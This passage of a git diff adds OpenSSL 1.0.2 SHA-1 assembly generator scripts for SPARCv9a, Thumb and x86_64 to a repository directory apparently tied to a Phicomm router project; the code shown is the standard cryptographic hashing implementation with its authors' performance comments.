+	and		$c,$b,$tmp3
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	 fxors		@X[($j+14)%16],@X[$j+1],@X[$j+1]! 0/ 0/ 0:X[1]^=X[14]
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	 fxor		@X[($j+2)%16],@X[($j+8)%16],%f18! 1/ 1/ 1:Tmp=X[2,3]^X[8,9]
+	sll		$b,30,$tmp2
+	add		$tmp1,$e,$e
+	andn		$d,$b,$tmp1
+	add		$Xi,$e,$e
+	 fxor		%f18,@X[$j],@X[$j]		! 2/ 4/ 3:X[0,1]^=X[2,3]^X[8,9]
+	srl		$b,2,$b
+	or		$tmp1,$tmp3,$tmp1
+	or		$tmp2,$b,$b
+	add		$tmp1,$e,$e
+	 faligndata	@X[$j],@X[$j],%f18		! 3/ 7/ 5:Tmp=X[0,1]>>>24
+___
+$code.=<<___ if ($i&1);
+	sll		$a,5,$tmp0			!! $i
+	and		$c,$b,$tmp3
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	 fpadd32	@X[$j],@X[$j],@X[$j]		! 4/ 8/ 6:X[0,1]<<=1
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	 fmul8ulx16	%f18,$fmul,%f18			! 5/10/ 7:Tmp>>=7, Tmp&=1
+	sll		$b,30,$tmp2
+	add		$tmp1,$e,$e
+	 fpadd32	$K,@X[$l],%f20			!
+	andn		$d,$b,$tmp1
+	add		$Xi,$e,$e
+	 fxors		@X[($k+13)%16],@X[$k],@X[$k]	!-1/-1/-1:X[0]^=X[13]
+	srl		$b,2,$b
+	or		$tmp1,$tmp3,$tmp1
+	 fxor		%f18,@X[$j],@X[$j]		! 8/14/10:X[0,1]|=Tmp
+	or		$tmp2,$b,$b
+	add		$tmp1,$e,$e
+___
+$code.=<<___ if ($i&1 && $i>=2);
+	 std		%f20,[$Xfer+`4*$l`]		!
+___
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i&~1;
+my $k=($j+16+2)%16;	# ahead reference
+my $l=($j+16-2)%16;	# behind reference
+my $K=@VK[($j+16-2)/20];
+
+$j=($j+16)%16;
+
+$code.=<<___ if (!($i&1) && $i<64);
+	sll		$a,5,$tmp0			!! $i
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	 fxors		@X[($j+14)%16],@X[$j+1],@X[$j+1]! 0/ 0/ 0:X[1]^=X[14]
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	 fxor		@X[($j+2)%16],@X[($j+8)%16],%f18! 1/ 1/ 1:Tmp=X[2,3]^X[8,9]
+	xor		$c,$b,$tmp0
+	add		$tmp1,$e,$e
+	sll		$b,30,$tmp2
+	xor		$d,$tmp0,$tmp1
+	 fxor		%f18,@X[$j],@X[$j]		! 2/ 4/ 3:X[0,1]^=X[2,3]^X[8,9]
+	srl		$b,2,$b
+	add		$tmp1,$e,$e
+	or		$tmp2,$b,$b
+	add		$Xi,$e,$e
+	 faligndata	@X[$j],@X[$j],%f18		! 3/ 7/ 5:Tmp=X[0,1]>>>24
+___
+$code.=<<___ if ($i&1 && $i<64);
+	sll		$a,5,$tmp0			!! $i
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	 fpadd32	@X[$j],@X[$j],@X[$j]		! 4/ 8/ 6:X[0,1]<<=1
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	 fmul8ulx16	%f18,$fmul,%f18			! 5/10/ 7:Tmp>>=7, Tmp&=1
+	xor		$c,$b,$tmp0
+	add		$tmp1,$e,$e
+	 fpadd32	$K,@X[$l],%f20			!
+	sll		$b,30,$tmp2
+	xor		$d,$tmp0,$tmp1
+	 fxors		@X[($k+13)%16],@X[$k],@X[$k]	!-1/-1/-1:X[0]^=X[13]
+	srl		$b,2,$b
+	add		$tmp1,$e,$e
+	 fxor		%f18,@X[$j],@X[$j]		! 8/14/10:X[0,1]|=Tmp
+	or		$tmp2,$b,$b
+	add		$Xi,$e,$e
+	 std		%f20,[$Xfer+`4*$l`]		!
+___
+$code.=<<___ if ($i==64);
+	sll		$a,5,$tmp0			!! $i
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	 fpadd32	$K,@X[$l],%f20
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	xor		$c,$b,$tmp0
+	add		$tmp1,$e,$e
+	sll		$b,30,$tmp2
+	xor		$d,$tmp0,$tmp1
+	 std		%f20,[$Xfer+`4*$l`]
+	srl		$b,2,$b
+	add		$tmp1,$e,$e
+	or		$tmp2,$b,$b
+	add		$Xi,$e,$e
+___
+$code.=<<___ if ($i>64);
+	sll		$a,5,$tmp0			!! $i
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	xor		$c,$b,$tmp0
+	add		$tmp1,$e,$e
+	sll		$b,30,$tmp2
+	xor		$d,$tmp0,$tmp1
+	srl		$b,2,$b
+	add		$tmp1,$e,$e
+	or		$tmp2,$b,$b
+	add		$Xi,$e,$e
+___
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i&~1;
+my $k=($j+16+2)%16;	# ahead reference
+my $l=($j+16-2)%16;	# behind reference
+my $K=@VK[($j+16-2)/20];
+
+$j=($j+16)%16;
+
+$code.=<<___ if (!($i&1));
+	sll		$a,5,$tmp0			!! $i
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	 fxors		@X[($j+14)%16],@X[$j+1],@X[$j+1]! 0/ 0/ 0:X[1]^=X[14]
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	 fxor		@X[($j+2)%16],@X[($j+8)%16],%f18! 1/ 1/ 1:Tmp=X[2,3]^X[8,9]
+	and		$c,$b,$tmp0
+	add		$tmp1,$e,$e
+	sll		$b,30,$tmp2
+	or		$c,$b,$tmp1
+	 fxor		%f18,@X[$j],@X[$j]		! 2/ 4/ 3:X[0,1]^=X[2,3]^X[8,9]
+	srl		$b,2,$b
+	and		$d,$tmp1,$tmp1
+	add		$Xi,$e,$e
+	or		$tmp1,$tmp0,$tmp1
+	 faligndata	@X[$j],@X[$j],%f18		! 3/ 7/ 5:Tmp=X[0,1]>>>24
+	or		$tmp2,$b,$b
+	add		$tmp1,$e,$e
+	 fpadd32	@X[$j],@X[$j],@X[$j]		! 4/ 8/ 6:X[0,1]<<=1
+___
+$code.=<<___ if ($i&1);
+	sll		$a,5,$tmp0			!! $i
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	 fmul8ulx16	%f18,$fmul,%f18			! 5/10/ 7:Tmp>>=7, Tmp&=1
+	and		$c,$b,$tmp0
+	add		$tmp1,$e,$e
+	 fpadd32	$K,@X[$l],%f20			!
+	sll		$b,30,$tmp2
+	or		$c,$b,$tmp1
+	 fxors		@X[($k+13)%16],@X[$k],@X[$k]	!-1/-1/-1:X[0]^=X[13]
+	srl		$b,2,$b
+	and		$d,$tmp1,$tmp1
+	 fxor		%f18,@X[$j],@X[$j]		! 8/14/10:X[0,1]|=Tmp
+	add		$Xi,$e,$e
+	or		$tmp1,$tmp0,$tmp1
+	or		$tmp2,$b,$b
+	add		$tmp1,$e,$e
+	 std		%f20,[$Xfer+`4*$l`]		!
+___
+}
+
+# If there is more data to process, then we pre-fetch the data for
+# next iteration in last ten rounds...
+sub BODY_70_79 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i&~1;
+my $m=($i%8)*2;
+
+$j=($j+16)%16;
+
+$code.=<<___ if ($i==70);
+	sll		$a,5,$tmp0			!! $i
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	 ldd		[$inp+64],@X[0]
+	xor		$c,$b,$tmp0
+	add		$tmp1,$e,$e
+	sll		$b,30,$tmp2
+	xor		$d,$tmp0,$tmp1
+	srl		$b,2,$b
+	add		$tmp1,$e,$e
+	or		$tmp2,$b,$b
+	add		$Xi,$e,$e
+
+	and		$inp,-64,$nXfer
+	inc		64,$inp
+	and		$nXfer,255,$nXfer
+	alignaddr	%g0,$align,%g0
+	add		$base,$nXfer,$nXfer
+___
+$code.=<<___ if ($i==71);
+	sll		$a,5,$tmp0			!! $i
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	xor		$c,$b,$tmp0
+	add		$tmp1,$e,$e
+	sll		$b,30,$tmp2
+	xor		$d,$tmp0,$tmp1
+	srl		$b,2,$b
+	add		$tmp1,$e,$e
+	or		$tmp2,$b,$b
+	add		$Xi,$e,$e
+___
+$code.=<<___ if ($i>=72);
+	 faligndata	@X[$m],@X[$m+2],@X[$m]
+	sll		$a,5,$tmp0			!! $i
+	ld		[$Xfer+`4*($i%16)`],$Xi
+	srl		$a,27,$tmp1
+	add		$tmp0,$e,$e
+	xor		$c,$b,$tmp0
+	add		$tmp1,$e,$e
+	 fpadd32	$VK_00_19,@X[$m],%f20
+	sll		$b,30,$tmp2
+	xor		$d,$tmp0,$tmp1
+	srl		$b,2,$b
+	add		$tmp1,$e,$e
+	or		$tmp2,$b,$b
+	add		$Xi,$e,$e
+___
+$code.=<<___ if ($i<77);
+	 ldd		[$inp+`8*($i+1-70)`],@X[2*($i+1-70)]
+___
+$code.=<<___ if ($i==77);	# redundant if $inp was aligned
+	 add		$align,63,$tmp0
+	 and		$tmp0,-8,$tmp0
+	 ldd		[$inp+$tmp0],@X[16]
+___
+$code.=<<___ if ($i>=72);
+	 std		%f20,[$nXfer+`4*$m`]
+___
+}
+
+$code.=<<___;
+.section	".text",#alloc,#execinstr
+
+.align	64
+vis_const:
+.long	0x5a827999,0x5a827999	! K_00_19
+.long	0x6ed9eba1,0x6ed9eba1	! K_20_39
+.long	0x8f1bbcdc,0x8f1bbcdc	! K_40_59
+.long	0xca62c1d6,0xca62c1d6	! K_60_79
+.long	0x00000100,0x00000100
+.align	64
+.type	vis_const,#object
+.size	vis_const,(.-vis_const)
+
+.globl	sha1_block_data_order
+sha1_block_data_order:
+	save	%sp,-$frame,%sp
+	add	%fp,$bias-256,$base
+
+1:	call	.+8
+	add	%o7,vis_const-1b,$tmp0
+
+	ldd	[$tmp0+0],$VK_00_19
+	ldd	[$tmp0+8],$VK_20_39
+	ldd	[$tmp0+16],$VK_40_59
+	ldd	[$tmp0+24],$VK_60_79
+	ldd	[$tmp0+32],$fmul
+
+	ld	[$ctx+0],$Actx
+	and	$base,-256,$base
+	ld	[$ctx+4],$Bctx
+	sub	$base,$bias+$frame,%sp
+	ld	[$ctx+8],$Cctx
+	and	$inp,7,$align
+	ld	[$ctx+12],$Dctx
+	and	$inp,-8,$inp
+	ld	[$ctx+16],$Ectx
+
+	! X[16] is maintained in FP register bank
+	alignaddr	%g0,$align,%g0
+	ldd		[$inp+0],@X[0]
+	sub		$inp,-64,$Xfer
+	ldd		[$inp+8],@X[2]
+	and		$Xfer,-64,$Xfer
+	ldd		[$inp+16],@X[4]
+	and		$Xfer,255,$Xfer
+	ldd		[$inp+24],@X[6]
+	add		$base,$Xfer,$Xfer
+	ldd		[$inp+32],@X[8]
+	ldd		[$inp+40],@X[10]
+	ldd		[$inp+48],@X[12]
+	brz,pt		$align,.Laligned
+	ldd		[$inp+56],@X[14]
+
+	ldd		[$inp+64],@X[16]
+	faligndata	@X[0],@X[2],@X[0]
+	faligndata	@X[2],@X[4],@X[2]
+	faligndata	@X[4],@X[6],@X[4]
+	faligndata	@X[6],@X[8],@X[6]
+	faligndata	@X[8],@X[10],@X[8]
+	faligndata	@X[10],@X[12],@X[10]
+	faligndata	@X[12],@X[14],@X[12]
+	faligndata	@X[14],@X[16],@X[14]
+
+.Laligned:
+	mov		5,$tmp0
+	dec		1,$len
+	alignaddr	%g0,$tmp0,%g0
+	fpadd32		$VK_00_19,@X[0],%f16
+	fpadd32		$VK_00_19,@X[2],%f18
+	fpadd32		$VK_00_19,@X[4],%f20
+	fpadd32		$VK_00_19,@X[6],%f22
+	fpadd32		$VK_00_19,@X[8],%f24
+	fpadd32		$VK_00_19,@X[10],%f26
+	fpadd32		$VK_00_19,@X[12],%f28
+	fpadd32		$VK_00_19,@X[14],%f30
+	std		%f16,[$Xfer+0]
+	mov		$Actx,$A
+	std		%f18,[$Xfer+8]
+	mov		$Bctx,$B
+	std		%f20,[$Xfer+16]
+	mov		$Cctx,$C
+	std		%f22,[$Xfer+24]
+	mov		$Dctx,$D
+	std		%f24,[$Xfer+32]
+	mov		$Ectx,$E
+	std		%f26,[$Xfer+40]
+	fxors		@X[13],@X[0],@X[0]
+	std		%f28,[$Xfer+48]
+	ba		.Loop
+	std		%f30,[$Xfer+56]
+.align	32
+.Loop:
+___
+for ($i=0;$i<20;$i++)	{ &BODY_00_19($i,@V); unshift(@V,pop(@V)); }
+for (;$i<40;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+for (;$i<60;$i++)	{ &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+for (;$i<70;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	tst		$len
+	bz,pn		`$bits==32?"%icc":"%xcc"`,.Ltail
+	nop
+___
+for (;$i<80;$i++)	{ &BODY_70_79($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	add		$A,$Actx,$Actx
+	add		$B,$Bctx,$Bctx
+	add		$C,$Cctx,$Cctx
+	add		$D,$Dctx,$Dctx
+	add		$E,$Ectx,$Ectx
+	mov		5,$tmp0
+	fxors		@X[13],@X[0],@X[0]
+	mov		$Actx,$A
+	mov		$Bctx,$B
+	mov		$Cctx,$C
+	mov		$Dctx,$D
+	mov		$Ectx,$E
+	alignaddr	%g0,$tmp0,%g0	
+	dec		1,$len
+	ba		.Loop
+	mov		$nXfer,$Xfer
+
+.align	32
+.Ltail:
+___
+for($i=70;$i<80;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	add	$A,$Actx,$Actx
+	add	$B,$Bctx,$Bctx
+	add	$C,$Cctx,$Cctx
+	add	$D,$Dctx,$Dctx
+	add	$E,$Ectx,$Ectx
+
+	st	$Actx,[$ctx+0]
+	st	$Bctx,[$ctx+4]
+	st	$Cctx,[$ctx+8]
+	st	$Dctx,[$ctx+12]
+	st	$Ectx,[$ctx+16]
+
+	ret
+	restore
+.type	sha1_block_data_order,#function
+.size	sha1_block_data_order,(.-sha1_block_data_order)
+.asciz	"SHA1 block transform for SPARCv9a, CRYPTOGAMS by <appro\@openssl.org>"
+.align	4
+___
+
+# Purpose of these subroutines is to explicitly encode VIS instructions,
+# so that one can compile the module without having to specify VIS
+# extentions on compiler command line, e.g. -xarch=v9 vs. -xarch=v9a.
+# Idea is to reserve for option to produce "universal" binary and let
+# programmer detect if current CPU is VIS capable at run-time.
+sub unvis {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my ($ref,$opf);
+my %visopf = (	"fmul8ulx16"	=> 0x037,
+		"faligndata"	=> 0x048,
+		"fpadd32"	=> 0x052,
+		"fxor"		=> 0x06c,
+		"fxors"		=> 0x06d	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if ($opf=$visopf{$mnemonic}) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%f([0-9]{1,2})/);
+	    $_=$1;
+	    if ($1>=32) {
+		return $ref if ($1&1);
+		# re-encode for upper double register addressing
+		$_=($1|$1>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+sub unalignaddr {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24 );
+my $ref="$mnemonic\t$rs1,$rs2,$rd";
+
+    foreach ($rs1,$rs2,$rd) {
+	if (/%([goli])([0-7])/)	{ $_=$bias{$1}+$2; }
+	else			{ return $ref; }
+    }
+    return  sprintf ".word\t0x%08x !%s",
+		    0x81b00300|$rd<<25|$rs1<<14|$rs2,
+		    $ref;
+}
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+$code =~ s/\b(f[^\s]*)\s+(%f[0-9]{1,2}),(%f[0-9]{1,2}),(%f[0-9]{1,2})/
+		&unvis($1,$2,$3,$4)
+	  /gem;
+$code =~ s/\b(alignaddr)\s+(%[goli][0-7]),(%[goli][0-7]),(%[goli][0-7])/
+		&unalignaddr($1,$2,$3,$4)
+	  /gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-thumb.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-thumb.pl
new file mode 100644
index 0000000..7c9ea9b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-thumb.pl
@@ -0,0 +1,259 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# sha1_block for Thumb.
+#
+# January 2007.
+#
+# The code does not present direct interest to OpenSSL, because of low
+# performance. Its purpose is to establish _size_ benchmark. Pretty
+# useless one I must say, because 30% or 88 bytes larger ARMv4 code
+# [avialable on demand] is almost _twice_ as fast. It should also be
+# noted that in-lining of .Lcommon and .Lrotate improves performance
+# by over 40%, while code increases by only 10% or 32 bytes. But once
+# again, the goal was to establish _size_ benchmark, not performance.
+
+$output=shift;
+open STDOUT,">$output";
+
+$inline=0;
+#$cheat_on_binutils=1;
+
+$t0="r0";
+$t1="r1";
+$t2="r2";
+$a="r3";
+$b="r4";
+$c="r5";
+$d="r6";
+$e="r7";
+$K="r8";	# "upper" registers can be used in add/sub and mov insns
+$ctx="r9";
+$inp="r10";
+$len="r11";
+$Xi="r12";
+
+sub common {
+<<___;
+	sub	$t0,#4
+	ldr	$t1,[$t0]
+	add	$e,$K			@ E+=K_xx_xx
+	lsl	$t2,$a,#5
+	add	$t2,$e
+	lsr	$e,$a,#27
+	add	$t2,$e			@ E+=ROR(A,27)
+	add	$t2,$t1			@ E+=X[i]
+___
+}
+sub rotate {
+<<___;
+	mov	$e,$d			@ E=D
+	mov	$d,$c			@ D=C
+	lsl	$c,$b,#30
+	lsr	$b,$b,#2
+	orr	$c,$b			@ C=ROR(B,2)
+	mov	$b,$a			@ B=A
+	add	$a,$t2,$t1		@ A=E+F_xx_xx(B,C,D)
+___
+}
+
+sub BODY_00_19 {
+$code.=$inline?&common():"\tbl	.Lcommon\n";
+$code.=<<___;
+	mov	$t1,$c
+	eor	$t1,$d
+	and	$t1,$b
+	eor	$t1,$d			@ F_00_19(B,C,D)
+___
+$code.=$inline?&rotate():"\tbl	.Lrotate\n";
+}
+
+sub BODY_20_39 {
+$code.=$inline?&common():"\tbl	.Lcommon\n";
+$code.=<<___;
+	mov	$t1,$b
+	eor	$t1,$c
+	eor	$t1,$d			@ F_20_39(B,C,D)
+___
+$code.=$inline?&rotate():"\tbl	.Lrotate\n";
+}
+
+sub BODY_40_59 {
+$code.=$inline?&common():"\tbl	.Lcommon\n";
+$code.=<<___;
+	mov	$t1,$b
+	and	$t1,$c
+	mov	$e,$b
+	orr	$e,$c
+	and	$e,$d
+	orr	$t1,$e			@ F_40_59(B,C,D)
+___
+$code.=$inline?&rotate():"\tbl	.Lrotate\n";
+}
+
+$code=<<___;
+.text
+.code	16
+
+.global	sha1_block_data_order
+.type	sha1_block_data_order,%function
+
+.align	2
+sha1_block_data_order:
+___
+if ($cheat_on_binutils) {
+$code.=<<___;
+.code	32
+	add	r3,pc,#1
+	bx	r3			@ switch to Thumb ISA
+.code	16
+___
+}
+$code.=<<___;
+	push	{r4-r7}
+	mov	r3,r8
+	mov	r4,r9
+	mov	r5,r10
+	mov	r6,r11
+	mov	r7,r12
+	push	{r3-r7,lr}
+	lsl	r2,#6
+	mov	$ctx,r0			@ save context
+	mov	$inp,r1			@ save inp
+	mov	$len,r2			@ save len
+	add	$len,$inp		@ $len to point at inp end
+
+.Lloop:
+	mov	$Xi,sp
+	mov	$t2,sp
+	sub	$t2,#16*4		@ [3]
+.LXload:
+	ldrb	$a,[$t1,#0]		@ $t1 is r1 and holds inp
+	ldrb	$b,[$t1,#1]
+	ldrb	$c,[$t1,#2]
+	ldrb	$d,[$t1,#3]
+	lsl	$a,#24
+	lsl	$b,#16
+	lsl	$c,#8
+	orr	$a,$b
+	orr	$a,$c
+	orr	$a,$d
+	add	$t1,#4
+	push	{$a}
+	cmp	sp,$t2
+	bne	.LXload			@ [+14*16]
+
+	mov	$inp,$t1		@ update $inp
+	sub	$t2,#32*4
+	sub	$t2,#32*4
+	mov	$e,#31			@ [+4]
+.LXupdate:
+	ldr	$a,[sp,#15*4]
+	ldr	$b,[sp,#13*4]
+	ldr	$c,[sp,#7*4]
+	ldr	$d,[sp,#2*4]
+	eor	$a,$b
+	eor	$a,$c
+	eor	$a,$d
+	ror	$a,$e
+	push	{$a}
+	cmp	sp,$t2
+	bne	.LXupdate		@ [+(11+1)*64]
+
+	ldmia	$t0!,{$a,$b,$c,$d,$e}	@ $t0 is r0 and holds ctx
+	mov	$t0,$Xi
+
+	ldr	$t2,.LK_00_19
+	mov	$t1,$t0
+	sub	$t1,#20*4
+	mov	$Xi,$t1
+	mov	$K,$t2			@ [+7+4]
+.L_00_19:
+___
+	&BODY_00_19();
+$code.=<<___;
+	cmp	$Xi,$t0
+	bne	.L_00_19		@ [+(2+9+4+2+8+2)*20]
+
+	ldr	$t2,.LK_20_39
+	mov	$t1,$t0
+	sub	$t1,#20*4
+	mov	$Xi,$t1
+	mov	$K,$t2			@ [+5]
+.L_20_39_or_60_79:
+___
+	&BODY_20_39();
+$code.=<<___;
+	cmp	$Xi,$t0
+	bne	.L_20_39_or_60_79	@ [+(2+9+3+2+8+2)*20*2]
+	cmp	sp,$t0
+	beq	.Ldone			@ [+2]
+
+	ldr	$t2,.LK_40_59
+	mov	$t1,$t0
+	sub	$t1,#20*4
+	mov	$Xi,$t1
+	mov	$K,$t2			@ [+5]
+.L_40_59:
+___
+	&BODY_40_59();
+$code.=<<___;
+	cmp	$Xi,$t0
+	bne	.L_40_59		@ [+(2+9+6+2+8+2)*20]
+
+	ldr	$t2,.LK_60_79
+	mov	$Xi,sp
+	mov	$K,$t2
+	b	.L_20_39_or_60_79	@ [+4]
+.Ldone:
+	mov	$t0,$ctx
+	ldr	$t1,[$t0,#0]
+	ldr	$t2,[$t0,#4]
+	add	$a,$t1
+	ldr	$t1,[$t0,#8]
+	add	$b,$t2
+	ldr	$t2,[$t0,#12]
+	add	$c,$t1
+	ldr	$t1,[$t0,#16]
+	add	$d,$t2
+	add	$e,$t1
+	stmia	$t0!,{$a,$b,$c,$d,$e}	@ [+20]
+
+	add	sp,#80*4		@ deallocate stack frame
+	mov	$t0,$ctx		@ restore ctx
+	mov	$t1,$inp		@ restore inp
+	cmp	$t1,$len
+	beq	.Lexit
+	b	.Lloop			@ [+6] total 3212 cycles
+.Lexit:
+	pop	{r2-r7}
+	mov	r8,r2
+	mov	r9,r3
+	mov	r10,r4
+	mov	r11,r5
+	mov	r12,r6
+	mov	lr,r7
+	pop	{r4-r7}
+	bx	lr
+.align	2
+___
+$code.=".Lcommon:\n".&common()."\tmov	pc,lr\n" if (!$inline);
+$code.=".Lrotate:\n".&rotate()."\tmov	pc,lr\n" if (!$inline);
+$code.=<<___;
+.align	2
+.LK_00_19:	.word	0x5a827999
+.LK_20_39:	.word	0x6ed9eba1
+.LK_40_59:	.word	0x8f1bbcdc
+.LK_60_79:	.word	0xca62c1d6
+.size	sha1_block_data_order,.-sha1_block_data_order
+.asciz	"SHA1 block transform for Thumb, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+print $code;
+close STDOUT; # enforce flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-x86_64.pl
new file mode 100755
index 0000000..9bb6b49
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-x86_64.pl
@@ -0,0 +1,2067 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# sha1_block procedure for x86_64.
+#
+# It was brought to my attention that on EM64T compiler-generated code
+# was far behind 32-bit assembler implementation. This is unlike on
+# Opteron where compiler-generated code was only 15% behind 32-bit
+# assembler, which originally made it hard to motivate the effort.
+# There was suggestion to mechanically translate 32-bit code, but I
+# dismissed it, reasoning that x86_64 offers enough register bank
+# capacity to fully utilize SHA-1 parallelism. Therefore this fresh
+# implementation:-) However! While 64-bit code does perform better
+# on Opteron, I failed to beat 32-bit assembler on EM64T core. Well,
+# x86_64 does offer larger *addressable* bank, but out-of-order core
+# reaches for even more registers through dynamic aliasing, and EM64T
+# core must have managed to run-time optimize even 32-bit code just as
+# good as 64-bit one. Performance improvement is summarized in the
+# following table:
+#
+#		gcc 3.4		32-bit asm	cycles/byte
+# Opteron	+45%		+20%		6.8
+# Xeon P4	+65%		+0%		9.9
+# Core2		+60%		+10%		7.0
+
+# August 2009.
+#
+# The code was revised to minimize code size and to maximize
+# "distance" between instructions producing input to 'lea'
+# instruction and the 'lea' instruction itself, which is essential
+# for Intel Atom core.
+
+# October 2010.
+#
+# Add SSSE3, Supplemental[!] SSE3, implementation. The idea behind it
+# is to offload message schedule denoted by Wt in NIST specification,
+# or Xupdate in OpenSSL source, to SIMD unit. See sha1-586.pl module
+# for background and implementation details. The only difference from
+# 32-bit code is that 64-bit code doesn't have to spill @X[] elements
+# to free temporary registers.
+
+# April 2011.
+#
+# Add AVX code path. See sha1-586.pl for further information.
+
+# May 2013.
+#
+# Add AVX2+BMI code path. Initial attempt (utilizing BMI instructions
+# and loading pair of consecutive blocks to 256-bit %ymm registers)
+# did not provide impressive performance improvement till a crucial
+# hint regarding the number of Xupdate iterations to pre-compute in
+# advance was provided by Ilya Albrekht of Intel Corp.
+
+# March 2014.
+#
+# Add support for Intel SHA Extensions.
+
+######################################################################
+# Current performance is summarized in following table. Numbers are
+# CPU clock cycles spent to process single byte (less is better).
+#
+#		x86_64		SSSE3		AVX[2]
+# P4		9.05		-
+# Opteron	6.26		-
+# Core2		6.55		6.05/+8%	-
+# Westmere	6.73		5.30/+27%	-
+# Sandy Bridge	7.70		6.10/+26%	4.99/+54%
+# Ivy Bridge	6.06		4.67/+30%	4.60/+32%
+# Haswell	5.45		4.15/+31%	3.57/+53%
+# Bulldozer	9.11		5.95/+53%
+# VIA Nano	9.32		7.15/+30%
+# Atom		10.3		9.17/+12%
+# Silvermont	13.1(*)		9.37/+40%
+#
+# (*)	obviously suboptimal result, nothing was done about it,
+#	because SSSE3 code is compiled unconditionally;
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+}
+
+if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	   `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+}
+
+if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	   `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+}
+
+if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([2-9]\.[0-9]+)/) {
+	$avx = ($2>=3.0) + ($2>3.0);
+}
+
+$shaext=1;	### set to zero if compiling for 1.0.1
+$avx=1		if (!$shaext && $avx);
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+$ctx="%rdi";	# 1st arg
+$inp="%rsi";	# 2nd arg
+$num="%rdx";	# 3rd arg
+
+# reassign arguments in order to produce more compact code
+$ctx="%r8";
+$inp="%r9";
+$num="%r10";
+
+$t0="%eax";
+$t1="%ebx";
+$t2="%ecx";
+@xi=("%edx","%ebp","%r14d");
+$A="%esi";
+$B="%edi";
+$C="%r11d";
+$D="%r12d";
+$E="%r13d";
+
+@V=($A,$B,$C,$D,$E);
+
+sub BODY_00_19 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___ if ($i==0);
+	mov	`4*$i`($inp),$xi[0]
+	bswap	$xi[0]
+___
+$code.=<<___ if ($i<15);
